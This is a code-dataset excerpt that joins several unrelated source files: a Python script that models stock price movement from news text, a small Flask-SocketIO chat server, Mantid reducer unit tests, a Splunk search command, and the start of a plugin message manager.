sklearn.cluster import SpectralClustering\nfrom sklearn.metrics import confusion_matrix, accuracy_score\n\nfrom nltk.corpus import stopwords\nfrom gensim.parsing.preprocessing import preprocess_documents\nfrom gensim.utils import simple_preprocess\nfrom gensim.test.utils import get_tmpfile\nfrom gensim.models import Phrases\nfrom gensim.models.phrases import Phraser\nfrom gensim.models import Word2Vec\nimport gensim.corpora as corpora\t\nfrom gensim.models.ldamodel import LdaModel\t\nfrom gensim.models import CoherenceModel\n\nimport spacy\n\nimport pyLDAvis\nimport pyLDAvis.gensim\n\n\n# python array of files by pycruft, stackoverflow\n# this function concats the stock data from different sources within a path directory\ndef gather_stocks_from_dir(path):\n dataframe_stocks_complete = pd.DataFrame()\n\n # gathers a list of names of all files in the dir\n stock_files = [f for f in listdir(path) if isfile(join(path, f))]\n\n for file in stock_files:\n if file.endswith('.p'):\n temp_stocks_dataframe = pd.read_pickle(path + '/' + file)\n dataframe_stocks_complete = dataframe_stocks_complete.append(temp_stocks_dataframe)\n\n return dataframe_stocks_complete\n\n\ndef gather_data_from_stocks():\n stocks_dataframe = gather_stocks_from_dir('./Stocks')\n\n # gather the values that will be used for regression\n y_class_stocks = pd.DataFrame([stocks_dataframe['close']]).transpose()\n\n # gather a list of close such that a second col updown can be created\n close_list = y_class_stocks['close']\n\n close_last = close_list[0]\n close_updown = [None]\n\n for ind in range(1, len(close_list)):\n if close_last <= close_list[ind]:\n close_updown.append('up')\n elif close_last > close_list[ind]:\n close_updown.append('down')\n close_last = close_list[ind]\n\n # add classification list to set of stocks\n # ERROR - with all stocks that are in dataframe there exists an index where there is a symbol change\n # This will make a single wrong value where the change of symbol is\n y_class_stocks['updown'] = close_updown\n\n return y_class_stocks.reset_index()\n\n\n# gather data from the sqlite3 database into a list for easier usage\ndef gather_news_content(database_path):\n connect = sqlite3.connect(database_path)\n cursor = connect.cursor()\n\n cursor.execute('''\n SELECT query, title, description, content, published_at FROM documents;\n ''')\n news_data = cursor.fetchall()\n # data is returned in a list of tuples\n # [(title, description, content, published_at)]\n\n # replacer will take away the special chars, and end of document [+number chars]\n news_data = replacer(news_data)\n\n # close connection and cursor\n cursor.close()\n connect.close()\n\n return news_data\n\n\ndef replacer(list_data):\n # for each piece of content within the list_data\n query_list = []\n dates_list = []\n content_list = []\n\n for content in list_data:\n content = list(content)\n\n # remove query from data so that all of the\n query = content[0]\n del content[0]\n\n # remove the date from each of the pieces of content\n date = content[-1]\n del content[-1]\n\n # for each piece of information within the content of each document\n temp_collect = []\n temp_last = ''\n for index in range(len(content)):\n if content[index] is not None:\n # replaces certain parts of the content of the data for better readability\n content[index] = re.sub(r'\\s+', ' ', content[index])\n content[index] = re.sub(r'<[/]*\\w>', '', content[index])\n content[index] = re.sub(r'[?]|[!]|[,]', '', content[index])\n end_string_list = content[index].split('[')\n\n # checks to see if the description is the same as the content of the file.\n temp_collect.append(end_string_list[0].lower())\n\n # remove excess date information\n if len(date) >= 10:\n date = date[0:10]\n\n query_list.append(query)\n dates_list.append(date)\n content_list.append(' '.join(temp_collect))\n\n # convert string to datetime\n for index_in_date_list in range(len(dates_list)):\n dates_list[index_in_date_list] = datetime.datetime.strptime(dates_list[index_in_date_list]\n , '%Y-%m-%d').replace(tzinfo=pytz.utc)\n\n return query_list, dates_list, content_list\n\n\ndef preprocess_content_for_gensim(content_list):\n for ind in range(len(content_list)):\n temp_store = remove_stopwords(content_list[ind])\n temp_store = temp_store.replace('-', '').split(' ')\n content_list[ind] = temp_store\n return content_list\n\n\ndef tsne_plot(model, word, perplexity, quit_words):\n # Gather the closest words a few times to have some data to look at\n close_words = model.similar_by_word(word)\n close_words_extra = []\n for word_item in close_words:\n close_words_extra.append(model.similar_by_word(word_item[0]))\n close_words_final = []\n for word_item in close_words_extra:\n close_words_final.append(model.similar_by_word(word_item[0]))\n close_words_final.append(close_words)\n\n X_data = np.empty((0, model.vector_size))\n\n word_labels = [word]\n\n # takes from Aneesha Bakharia python notebook\n # https://medium.com/@aneesha/using-tsne-to-plot-a-subset-of-similar-words-from-word2vec-bb8eeaea6229\n X_data = np.append(X_data, np.array([model[word]]), axis=0)\n for word_and_score in close_words_final:\n for words in word_and_score:\n word_vector = model[words[0]]\n word_labels.append(words[0])\n X_data = np.append(X_data, np.array([word_vector]), axis=0)\n\n tsne = TSNE(n_components=2, n_iter=10000, perplexity=perplexity, n_iter_without_progress=500)\n y = tsne.fit_transform(X_data)\n\n x_coordinates = []\n y_coordinates = []\n\n for x in y:\n x_coordinates.append(x[0])\n y_coordinates.append(x[1])\n\n plt.scatter(x_coordinates, y_coordinates)\n\n i = 0\n for label, x_co, y_co in zip(word_labels, x_coordinates, y_coordinates):\n plt.annotate(label, xy=(x_co, y_co), xytext=(0, 0), textcoords='offset points')\n if i > quit_words:\n break\n i += 1\n plt.xlim(min(x_coordinates) + 0.5, max(x_coordinates) + 0.5)\n plt.ylim(min(y_coordinates) + 0.5, max(y_coordinates) + 0.5)\n plt.show()\n\n\n# return both a data after and data before a date\ndef gather_data_before_and_after(dataframe, date):\n beforedataframe = pd.DataFrame()\n afterdataframe = pd.DataFrame()\n for index, row in dataframe.iterrows():\n if row['date'] < date:\n beforedataframe = beforedataframe.append(row)\n else:\n afterdataframe = afterdataframe.append(row)\n if index % 500 == 0:\n print(index)\n return beforedataframe, afterdataframe\n\n\n# return dataframe of all rows with date less than the param date\ndef data_before_date(dataframe, date):\n beforedataframe = pd.DataFrame()\n for index, row in dataframe.iterrows():\n if row['date'] < date:\n beforedataframe = beforedataframe.append(row)\n return beforedataframe, date\n\n\n# return dataframe of all rows with date more than or equal to the param date\ndef data_after_date(dataframe, date):\n afterdataframe = pd.DataFrame()\n for index, row in dataframe.iterrows():\n if row['date'] >= date:\n afterdataframe = afterdataframe.append(row)\n return afterdataframe, date\n\n\n# Splits the dataset for training and testing by the input date.\ndef tfidf_data_before_date(dataframe, date):\n tfidf_total_of_content = []\n tfidf_vector = TfidfVectorizer(stop_words='english', max_features=1000)\n for index, row in dataframe.iterrows():\n if row['date'] < date:\n tfidf_vector.fit([row['content']])\n\n for index, row in dataframe.iterrows():\n tfidf_total_of_content.append(tfidf_vector.transform([row['content']]).todense())\n\n dataframe['tfidf'] = tfidf_total_of_content\n\n train_data, test_data = gather_data_before_and_after(dataframe, date)\n\n return tfidf_vector, train_data, test_data\n\n\n# Does tfidf for the sklearn models\ndef tfidf_data(dataframe, date, full_return=True):\n tfidf_vector = TfidfVectorizer(stop_words='english', max_features=5000)\n train = []\n test = []\n tfidf_total_from_dataframe = []\n\n for index, row in dataframe.iterrows():\n if row['date'] < date:\n train.append(row['content'])\n else:\n test.append(row['content'])\n\n train_tfidf = tfidf_vector.fit_transform(train)\n test_tfidf = tfidf_vector.transform(test)\n train_df = pd.DataFrame(train_tfidf.todense())\n test_df = pd.DataFrame(test_tfidf.todense())\n tfidf_total_of_content = train_df.append(test_df, ignore_index=True)\n for index, row in dataframe.iterrows():\n tfidf_slive_of_content = np.array(tfidf_total_of_content.iloc[index])\n tfidf_total_from_dataframe.append(tfidf_slive_of_content)\n dataframe['tfidf'] = tfidf_total_from_dataframe # The creates a tfidf col with numpy array vectors\n '''\n for index, row in dataframe.iterrows():\n tfidf_vector.fit([row['content']])\n for index, row in dataframe.iterrows():\n temp = tfidf_vector.transform([row['content']])\n temp2 = temp.todense()\n tfidf_total_of_content.append(temp2.tolist()[0])\n dataframe['tfidf'] = tfidf_total_of_content\n '''\n\n if full_return:\n data_before, data_after = gather_data_before_and_after(dataframe, date)\n return dataframe, tfidf_total_of_content, tfidf_vector, data_before, data_after\n else:\n return dataframe, tfidf_total_of_content, tfidf_vector, None, None\n\n\ndef create_gensim_word_2_vec_model(content_list):\n gensim_content_list = preprocess_content_for_gensim(content_list)\n bigrams = Phrases(gensim_content_list)\n word_to_vec_model = Word2Vec(bigrams[gensim_content_list], min_count=1, window=3, size=300)\n return word_to_vec_model\n\n\ndef load_gensim_word_2_vec_model(path):\n file = get_tmpfile(path)\n return Word2Vec.load(file)\n\n\ndef updown_to_digit(training):\n # if it is a classification of a binary, which updown is\n training_class2 = list()\n\n for t_class in training:\n if t_class == 'up':\n training_class2.append(1)\n else:\n training_class2.append(0)\n\n training_class = np.asarray(training_class2).astype('int8')\n\n return training_class\n\n\ndef updown_to_1_0(training, testing):\n # if it is a classification of a binary, which updown is\n training_class2 = list()\n testing_class2 = list()\n\n for t_class in training:\n if t_class == 'up':\n training_class2.append(1)\n else:\n training_class2.append(0)\n\n for t_class in testing:\n if t_class == 'up':\n testing_class2.append(1)\n else:\n testing_class2.append(0)\n training_class = np.asarray(training_class2).astype('int8')\n testing_class = np.asarray(testing_class2).astype('int8')\n\n return training_class, testing_class\n\n\n# training and testing data is assumed to be in a list of values\n# df['content'] is the data\n# this was a modification of https://towardsdatascience.com/how-to-create-word-embedding-in-tensorflow-ed0a61507dd0\t\n# author Francesco Zuppichini\ndef keras_word_embedding_updown(training_data, testing_data, training_class, testing_class,\n embedding_dimension=None, model_ex='simple', updown=True,\n save_path='Models'):\n # create tokenizer to generate training and testing tokens for later use\n tokens = Tokenizer()\n total_text = training_data + testing_data\n tokens.fit_on_texts(total_text)\n\n # get the max len of any of the string such that they can be padded with zeros\n max_token_length = max([len(strings.split()) for strings in total_text])\n\n # num words in the vocab of the corpus\n vocab_size = len(tokens.word_index) + 1\n\n # convert training and testing strings to tokens\n training_data_tokens = tokens.texts_to_sequences(training_data)\n testing_data_tokens = tokens.texts_to_sequences(testing_data)\n\n # pads the training and testing data with zeros to make all the same length\n # pads with zeros at the end of the data\n training_data_tokens_pad = pad_sequences(training_data_tokens, maxlen=max_token_length, padding='post')\n testing_data_tokens_pad = pad_sequences(testing_data_tokens, maxlen=max_token_length, padding='post')\n\n if embedding_dimension is None:\n embedding_dimension = 100\n\n # if it is a classification of a binary, which updown is\n if updown:\n training_class, testing_class = updown_to_1_0(training_class, testing_class)\n\n model = Sequential()\n model.add(Embedding(vocab_size, embedding_dimension, input_length=max_token_length))\n\n # GRU does not have a dropout because of a bug in tensor 2.0 which doesn't allow a gru with dropout to be saved\n if model_ex == 'simple':\n # create a word embedding model\n model.add(GRU(units=embedding_dimension, dropout=0, recurrent_dropout=0))\n model.add(Dense(1, activation='sigmoid'))\n # Learning function for that model\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n # That it is a 100% accuracy, something broke\n elif model_ex == 'relu':\n # create word embedding model with close\n model.add(GRU(units=embedding_dimension))\n model.add(Dense(units=50, activation='relu'))\n model.add(Dense(1, activation='sigmoid'))\n # Learning function for that model\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n callbacks = ModelCheckpoint(save_path,\n save_best_only=True,\n verbose=1)\n\n model.fit(training_data_tokens_pad, training_class, batch_size=64,\n epochs=15, verbose=2, validation_data=(testing_data_tokens_pad, testing_class),\n callbacks=[callbacks])\n\n return model\n\n\ndef keras_tfidf(training_data, testing_data, training_class, testing_class, tfidf_vectorizer,\n model_ex='simple', updown=True, save_path='NN_STOCKS_UPDOWN_TFIDF'):\n feature_len = len(tfidf_vectorizer.get_feature_names())\n\n # if it is a classification of a binary, which updown is\n if updown:\n training_class, testing_class = updown_to_1_0(training_class, testing_class)\n\n model = Sequential()\n\n if model_ex == 'simple':\n model.add(Dense(units=feature_len, activation='sigmoid'))\n model.add(Dense(units=100, activation='sigmoid'))\n model.add(Dense(units=1))\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n if model_ex == 'relu':\n model.add(Dense(units=feature_len, activation='relu'))\n model.add(Dense(units=100, activation='sigmoid'))\n model.add(Dense(units=1))\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n callbacks = ModelCheckpoint(save_path,\n save_best_only=True,\n verbose=1)\n\n model.fit(training_data, training_class, batch_size=64, epochs=15,\n verbose=2, callbacks=[callbacks], validation_data=(testing_data, testing_class))\n\n return model\n\n\ndef date_and_content_class_gatherer(stocks_data, content_data):\n amzn_updown = []\n amzn_close = []\n amd_updown = []\n amd_close = []\n aapl_updown = []\n aapl_close = []\n jpm_updown = []\n jpm_close = []\n gme_updown = []\n gme_close = []\n googl_updown = []\n googl_close = []\n hpq_updown = []\n hpq_close = []\n lyft_updown = []\n lyft_close = []\n msft_updown = []\n msft_close = []\n ntdoy_updown = []\n ntdoy_close = []\n nvda_updown = []\n nvda_close = []\n sne_updown = []\n sne_close = []\n td_updown = []\n td_close = []\n uber_updown = []\n uber_close = []\n\n for index, content in content_data.iterrows():\n date = content['date']\n stocks_date = stocks_data.loc[stocks_data['date'] == date]\n\n # This section of code is for selecting the monday after a weekend if the content was posted on a weekend\n # this also accounts for days that are considered holidays\n # placing the close and updown at the end of the holiday\n # this breaks if the date of content is beyond the date of stocks\n while stocks_date.empty:\n date = date + timedelta(days=1)\n stocks_date = stocks_data.loc[stocks_data['date'] == date]\n\n for index, stock in stocks_date.iterrows():\n if stock['symbol'] == 'AMZN':\n amzn_updown.append(stock['updown'])\n amzn_close.append(stock['close'])\n elif stock['symbol'] == 'AMD':\n amd_updown.append(stock['updown'])\n amd_close.append(stock['close'])\n elif stock['symbol'] == 'AAPL':\n aapl_updown.append(stock['updown'])\n aapl_close.append(stock['close'])\n elif stock['symbol'] == 'JPM':\n jpm_updown.append(stock['updown'])\n jpm_close.append(stock['close'])\n elif stock['symbol'] == 'GME':\n gme_updown.append(stock['updown'])\n gme_close.append(stock['close'])\n elif stock['symbol'] == 'GOOGL':\n googl_updown.append(stock['updown'])\n googl_close.append(stock['close'])\n elif stock['symbol'] == 'HPQ':\n hpq_updown.append(stock['updown'])\n hpq_close.append(stock['close'])\n elif stock['symbol'] == 'LYFT':\n lyft_updown.append(stock['updown'])\n lyft_close.append(stock['close'])\n elif stock['symbol'] == 'MSFT':\n msft_updown.append(stock['updown'])\n msft_close.append(stock['close'])\n elif stock['symbol'] == 'NTDOY':\n ntdoy_updown.append(stock['updown'])\n ntdoy_close.append(stock['close'])\n elif stock['symbol'] == 'NVDA':\n nvda_updown.append(stock['updown'])\n nvda_close.append(stock['close'])\n elif stock['symbol'] == 'SNE':\n sne_updown.append(stock['updown'])\n sne_close.append(stock['close'])\n elif stock['symbol'] == 'TD':\n td_updown.append(stock['updown'])\n td_close.append(stock['close'])\n elif stock['symbol'] == 'UBER':\n uber_updown.append(stock['updown'])\n uber_close.append(stock['close'])\n\n content_data['AMZN_updown'] = amzn_updown\n content_data['AMZN_close'] = amzn_close\n content_data['AMD_updown'] = amd_updown\n content_data['AMD_close'] = amd_close\n content_data['AAPL_updown'] = aapl_updown\n content_data['AAPL_close'] = aapl_close\n content_data['JPM_updown'] = jpm_updown\n content_data['JPM_close'] = jpm_close\n content_data['GME_updown'] = gme_updown\n content_data['GME_close'] = gme_close\n content_data['GOOGL_updown'] = googl_updown\n content_data['GOOGL_close'] = googl_close\n content_data['HPQ_updown'] = hpq_updown\n content_data['HPQ_close'] = hpq_close\n content_data['LYFT_updown'] = lyft_updown\n content_data['LYFT_close'] = lyft_close\n content_data['MSFT_updown'] = msft_updown\n content_data['MSFT_close'] = msft_close\n content_data['NTDOY_updown'] = ntdoy_updown\n content_data['NTDOY_close'] = ntdoy_close\n content_data['NVDA_updown'] = nvda_updown\n content_data['NVDA_close'] = nvda_close\n content_data['SNE_updown'] = sne_updown\n content_data['SNE_close'] = sne_close\n content_data['TD_updown'] = td_updown\n content_data['TD_close'] = td_close\n content_data['UBER_updown'] = uber_updown\n content_data['UBER_close'] = uber_close\n\n return content_data\n\n\ndef sklearn_linear_models_classifier(training_data, training_class, name, models, model_params,\n model_save_folders, model_names):\n training_class = updown_to_digit(training_class)\n for model, params, save, save_name in zip(models, model_params, model_save_folders, model_names):\n print(save)\n grid = GridSearchCV(model, params, cv=5, n_jobs=3, scoring='accuracy')\n vector_total_content = []\n for index, row in training_data.iterrows():\n vector_slice_of_content = np.array(training_data.iloc[index])\n vector_total_content.append(vector_slice_of_content)\n grid.fit(vector_total_content, training_class)\n with open('SKLEARN_MODELS/' + name + '/' + save + '/' + save_name, 'wb') as file:\n pickle.dump(grid, file)\n with open('SKLEARN_MODELS/' + name + '/' + save + '/' + save_name + 'output.txt', 'w+') as file:\n file.write(str(grid.best_estimator_))\n file.write('\\n')\n file.write(str(grid.best_score_))\n\n\n# This next section of functions was mainly taken from week 9 content\ndef sent_to_words(sentences):\n for sentence in sentences:\n yield simple_preprocess(str(sentence), deacc=True)\n\n\ndef remove_stopwords(texts, stop_words):\n return [[word for word in simple_preprocess(str(doc)) if word not in stop_words] for doc in texts]\n\n\ndef make_bigrams(texts, bigram_mod):\n return [bigram_mod[doc] for doc in texts]\n\n\ndef make_trigrams(texts, bigram_mod, trigram_mod):\n return [trigram_mod[bigram_mod[doc]] for doc in texts]\n\n\ndef lemmatization(texts, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV']):\n \"\"\"https://spacy.io/api/annotation\"\"\"\n texts_out = []\n nlp = spacy.load('en', disable=['parser', 'ner'])\n for sent in texts:\n doc = nlp(\" \".join(sent))\n texts_out.append([token.lemma_ for token in doc if token.pos_ in allowed_postags])\n return texts_out\n\n\ndef visulaizer_of_gensim(content_list):\n stop_words = stopwords.words('english')\n\n data_words = list(sent_to_words(content_list))\n\n bigram = Phrases(data_words, min_count=5, threshold=100)\n trigram = Phrases(bigram[data_words], threshold=100)\n bigram_mod = Phraser(bigram)\n trigram_mod = Phraser(trigram)\n\n data_words_nostops = remove_stopwords(data_words, stop_words)\n data_words_bigrams = make_bigrams(data_words_nostops, bigram_mod)\n data_words_trigrams = make_trigrams(data_words_bigrams, bigram_mod, trigram_mod)\n data_lemmatized = lemmatization(data_words_trigrams, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV'])\n\n id2word = corpora.Dictionary(data_lemmatized)\n texts = data_lemmatized\n corpus = [id2word.doc2bow(text) for text in texts]\n\n lda_model = LdaModel(corpus=corpus,\n id2word=id2word,\n num_topics=20,\n random_state=100,\n update_every=1,\n chunksize=100,\n passes=10,\n alpha='auto',\n per_word_topics=True)\n\n vis = pyLDAvis.gensim.prepare(lda_model, corpus, id2word)\n\n return vis\n\n\nif __name__ == '__main__':\n warnings.filterwarnings(\"ignore\")\n # news data is gathered in the format [query, content, date_published],\n # where content is title, description, content.\n # There exist data which the query is None, this data was collected with the use of an old version of searchthenews\n # This can be used for another Y_test set for determining which class of news it was pulled from\n # query_list, dates_list, content_list = gather_news_content('news.db')\n # content_dataframe = pd.DataFrame([query_list, dates_list, content_list]).transpose()\n # content_dataframe.columns = ['query', 'date', 'content']\n\n # Stocks information\n stocks = gather_data_from_stocks()\n\n # gather all of the information into a single dataframe such that gathering training and testing sets becomes easier\n # This increases the size of time file but that is a fair tradeoff that i am willing to make\n # The dataframe is then saved such that the preprocessing\n # of the content and stocks information only happens a single time\n # total_data = date_and_content_class_gatherer(stocks, content_dataframe)\n # total_data.to_pickle('total_data.p')\n\n # all lines above this can be commented out if the total_data.p file exists\n total_data = pd.read_pickle('total_data.p')\n working_date = datetime.datetime.strptime('2019-11-15', '%Y-%m-%d').replace(tzinfo=pytz.UTC)\n\n # print('Dataframe split')\n # total_before, total_after = gather_data_before_and_after(total_data, working_date)\n # total_before.to_pickle('total_before.p')\n # total_after.to_pickle('total_after.p')\n\n # total_before = pd.read_pickle('total_before.p')\n # total_after = pd.read_pickle('total_after.p')\n\n '''\n print('NN Training')\n names = stocks.symbol.unique()\n for name in names:\n types = ['relu', 'simple']\n for nn_type in types:\n model = keras_word_embedding_updown(total_before['content'].tolist(), total_after['content'].tolist(),\n np.asarray(total_before[name + '_updown'].tolist()),\n np.asarray(total_after[name + '_updown'].tolist()),\n embedding_dimension=100, updown=True,\n model_ex=nn_type,\n save_path='NN_STOCKS_UPDOWN_EMBEDDED/' + name + '/' + nn_type.upper())\n '''\n\n # create a tfidf of the content_list\n # tfidf_vector, tfidf_data_before, tfidf_data_after = tfidf_data_before_date(total_data,\n # datetime.datetime(2019, 11, 15,\n # tzinfo=pytz.UTC))\n\n # with open('tfidf_vecotr.p', 'wb') as file:\n # pickle.dump(tfidf_vector, file)\n\n # with open('tfidf_vecotr.p', 'rb') as file:\n # tfidf_vector = pickle.load(file)\n\n # tfidf_data_before.to_pickle('tfidf_data_before')\n # tfidf_data_after.to_pickle('tfidf_data_after')\n\n # tfidf_data_before = pd.read_pickle('tfidf_data_before')\n # tfidf_data_after = pd.read_pickle('tfidf_data_after')\n # print(tfidf_data_before.head())\n # print(tfidf_data_after.head())\n\n '''\n print('NN Training')\n names = stocks.symbol.unique()\n for name in names:\n types = ['SIMPLE', 'RELU']\n for nn_type in types:\n model = keras_tfidf(np.asarray(tfidf_data_before['tfidf'].tolist()),\n np.asarray(tfidf_data_after['tfidf'].tolist()),\n np.asarray(tfidf_data_before[name + '_updown'].tolist()),\n np.asarray(tfidf_data_after[name + '_updown'].tolist()),\n tfidf_vector,\n updown=True,\n model_ex=nn_type.lower(),\n save_path='NN_STOCKS_UPDOWN_TFIDF/' + name + '/' + nn_type.upper())\n '''\n\n # MultinomialNB, BernoulliNB, SVC, RandomForestClassifier, LinearRegression, LogisticRegression\n\n total_data, tfidf_total_of_content, tfidf_vector,\\\n data_before, data_after = tfidf_data(total_data, working_date, full_return=False)\n\n # total_data_tfidf.to_pickle('total_data_tfidf.p')\n\n # total_data_tfidf = pd.read_pickle('total_data_tfidf.p')\n\n bnb = BernoulliNB()\n mnb = MultinomialNB()\n rf = RandomForestClassifier()\n svc = SVC(gamma='scale')\n linr = LinearRegression()\n logr = LogisticRegression()\n knn = KNeighborsClassifier()\n sc = SpectralClustering()\n\n \"\"\"\n models = [sc, bnb, mnb, rf, linr, logr, knn]\n model_names = ['sc', 'bnb', 'mnb', 'rf', 'linr', 'logr', 'knn']\n model_save_folders = ['SC', 'BNB', 'MNB', 'RF', 'LINR', 'LOGR', 'KNN']\n models_params = [{'n_clusters': [2, 3, 4, 5, 6], 'n_init': [100]},\n {'alpha': [100, 1.0, 0.1], 'fit_prior': [True, False]},\n {'alpha': [100, 1.0, 0.1], 'fit_prior': [True, False]},\n {'n_estimators': [10, 100], 'criterion': ['gini', 'entropy']},\n {'fit_intercept': [True, False], 'normalize': [True, False]},\n {'dual': [True, False]},\n {'n_neighbors': [2, 3, 4, 5, 6], 'weights': ['uniform', 'distance']}]\n \"\"\"\n\n models = [svc]\n model_names = ['svc']\n model_save_folders = ['SVC']\n models_params = [{'C': [1.0], 'gamma': ['scale'], 'verbose': [True]}]\n\n names = stocks.symbol.unique()\n for name in names:\n if name == 'TD' or name == 'SNE' or name == 'UBER':\n print(name)\n sklearn_linear_models_classifier(tfidf_total_of_content,\n total_data[name + '_updown'], name,\n models, models_params, model_save_folders, model_names)\n else:\n continue\n\n # TSNE PLOT OF WORD2VEC similar words\n # word_to_vec_model = create_gensim_word_2_vec_model(content_list)\n # word_to_vec_model = load_gensim_word_2_vec_model('content_word2vec.p')\n # tsne_plot(word_to_vec_model, 'sony', 50, 20)\n\n # LDA topic model\n # vis = visulaizer_of_gensim(content_list=content_list)\n # pyLDAvis.save_html(vis, 'test.html')\n\n # {'n_clusters': [2, 3, 4, 5, 6], 'n_init': [10]},\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":30812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"119185248","text":"from flask import Flask, render_template, request\nfrom flask_socketio import SocketIO\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app, cors_allowed_origins='*')\n\nroom = {\n\n}\n\nchat = []\n\n@socketio.on('message')\ndef handle_message(message):\n print('received message: ' + message)\n\n@socketio.on('connect_room')\ndef connect_room(nickname):\n room[request.sid] = { 'name': str(nickname) }\n socketio.emit('current_users', room, broadcast=True)\n\n@socketio.on('send_message')\ndef send_message(message):\n chat.append( {'user': room[request.sid], 'message': message})\n socketio.emit('new_message_on_chat', chat, broadcast=True)\n\nif __name__ == '__main__':\n socketio.run(app)\n\n\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"368739449","text":"import unittest\nfrom MantidFramework import mtd\nmtd.initialise()\nfrom mantidsimple import LoadAscii, ConvertToHistogram\nfrom reduction import Reducer, ReductionStep, validate_step\n\n# Make sure we can import the UI\nfrom reduction_application import ReductionGUI\n\nclass TestReductionStep(ReductionStep):\n def __init__(self):\n self.some_value = 5\n def execute(self, reducer, workspace):\n return self.some_value\n \nclass ReducerTest(unittest.TestCase):\n \n def test_append_step(self):\n \"\"\"\n Test that a Mantid algorithm function can be added to a Reducer object\n \"\"\"\n r = Reducer()\n # An algorithm with a mandatory property that is NOT InputWorkspace or OutputWorkspace\n r.append_step(LoadAscii, \"AsciiExample.txt\", None)\n # Algorithm with InputWorkspace and OutputWorkspace\n r.append_step(ConvertToHistogram, None, None)\n for item in r._reduction_steps:\n result = item.execute(r, \"test2\")\n \n # Check that the workspace was created\n self.assertNotEqual(mtd[\"test2\"], None)\n mtd.deleteWorkspace(\"test2\")\n\n def test_pars_variation(self):\n \"\"\"\n Variations for parameter specification\n \"\"\"\n r = Reducer()\n # An algorithm with a mandatory property that is NOT InputWorkspace or OutputWorkspace\n r.append_step(LoadAscii, Filename=\"AsciiExample.txt\", OutputWorkspace=None)\n # Algorithm with InputWorkspace and OutputWorkspace\n r.append_step(ConvertToHistogram, None, None)\n for item in r._reduction_steps:\n result = item.execute(r, \"test2\")\n \n # Check that the workspace was created\n self.assertNotEqual(mtd[\"test2\"], None)\n mtd.deleteWorkspace(\"test2\")\n \n def test_output_wksp(self):\n \"\"\"\n Similar to previous test, but we specify the output workspace\n \"\"\"\n r = Reducer()\n # An algorithm with a mandatory property that is NOT InputWorkspace or OutputWorkspace\n r.append_step(LoadAscii, \"AsciiExample.txt\", None)\n # Algorithm with InputWorkspace and OutputWorkspace\n r.append_step(ConvertToHistogram, None, None)\n \n r._reduction_steps[0].execute(r, \"test2\")\n\n r._reduction_steps[1].execute(r, \"test2\", \"test3\")\n \n # Check that the workspace was created\n self.assertNotEqual(mtd[\"test2\"], None)\n self.assertNotEqual(mtd[\"test3\"], None)\n mtd.deleteWorkspace(\"test2\")\n mtd.deleteWorkspace(\"test3\")\n \n def test_parameter_variation(self):\n \"\"\"\n Similar to previous test, but the algo function is passed as a string\n \"\"\"\n r = Reducer()\n r.append_step(\"LoadAscii\", \"AsciiExample.txt\", None)\n for item in r._reduction_steps:\n result = item.execute(r, \"test2\")\n \n # Check that the workspace was created\n self.assertNotEqual(mtd[\"test2\"], None)\n mtd.deleteWorkspace(\"test2\")\n \n def test_reduction_step(self):\n \"\"\"\n Test that passing a ReductionStep object works \n \"\"\"\n r = Reducer()\n r.append_step(TestReductionStep())\n for item in r._reduction_steps:\n result = item.execute(r, \"test2\")\n self.assertEqual(result, 5)\n \n def test_decorator(self):\n \"\"\"\n Check that the decorator works for any method with a\n signature like func(reducer, algorithm)\n \"\"\"\n @validate_step\n def some_func(reducer, algorithm):\n self.assertTrue(issubclass(type(algorithm), ReductionStep))\n \n some_func(Reducer(), LoadAscii, \"AsciiExample.txt\", None)\n \n def test_bad_alg_name(self):\n r = Reducer()\n r.append_step(\"NotAnAlgorithm\")\n self.assertRaises(RuntimeError, r._reduction_steps[0].execute, (r, \"test\") )\n \n def test_data_files(self):\n r = Reducer()\n r.append_data_file(\"AsciiExample.txt\")\n \n # Check that we can empty the list of data files\n self.assertEqual(len(r._data_files), 1)\n r.clear_data_files()\n self.assertEqual(len(r._data_files), 0)\n\n def test_imports(self):\n import reduction_gui\n import reduction_application\n \n\nif __name__ == '__main__':\n unittest.main()","sub_path":"Code/Mantid/scripts/test/ReducerTest.py","file_name":"ReducerTest.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"188627893","text":"import sys\nimport json\nfrom splunklib.searchcommands import dispatch, GeneratingCommand, Configuration, Option\nfrom splunklib.searchcommands.validators import Boolean\n\n\n@Configuration(distributed=False, type='reporting')\nclass EnvironmentInstancesCommand(GeneratingCommand):\n\n id = Option(require=True)\n\n def generate(self):\n body = str(self.service.get(\n \"/services/msaas/environments/%s/instances\" % self.id)[\"body\"])\n instances = json.loads(body)\n for instance in instances:\n yield instance\n\ndispatch(EnvironmentInstancesCommand, sys.argv,\n sys.stdin, sys.stdout, __name__)\n","sub_path":"apps/msaas/bin/environment_instances_command.py","file_name":"environment_instances_command.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"488883427","text":"from Smartiome.Core.EventManager import *\nfrom queue import Queue, Empty\nfrom Smartiome.Auxillaries.SystemLogger import *\nimport threading\n\n\"\"\"\nGeneric Message Format:\n data[\"target\"]: str(plugin_name)\n data[\"source\"]: str(plugin_name)\n (opt)data[\"recipient\"]: str(recipient_id)\n data[\"content\"]: list(content or command)\n\"\"\"\n\nclass APIManager(object):\n lock = threading.Lock()\n lock.acquire()\n PLUGINS = {}\n PLUGINS_EVENTS_QUEUE = Queue()\n logger = SystemLogger()\n\n def __init__(self, EventManager):\n self.EventManager = EventManager\n\n def startWorkers(self):\n for plu in self.PLUGINS.values():\n plu.start_worker()\n\n def ReadPluginsMessage(self):\n print(\"Started\")\n while True:\n try:\n event = self.PLUGINS_EVENTS_QUEUE.get(block=False)\n # print(event)\n self.SendMessage(event)\n except Empty:\n pass\n\n def ReadMessage(self, event):\n #print(event)\n 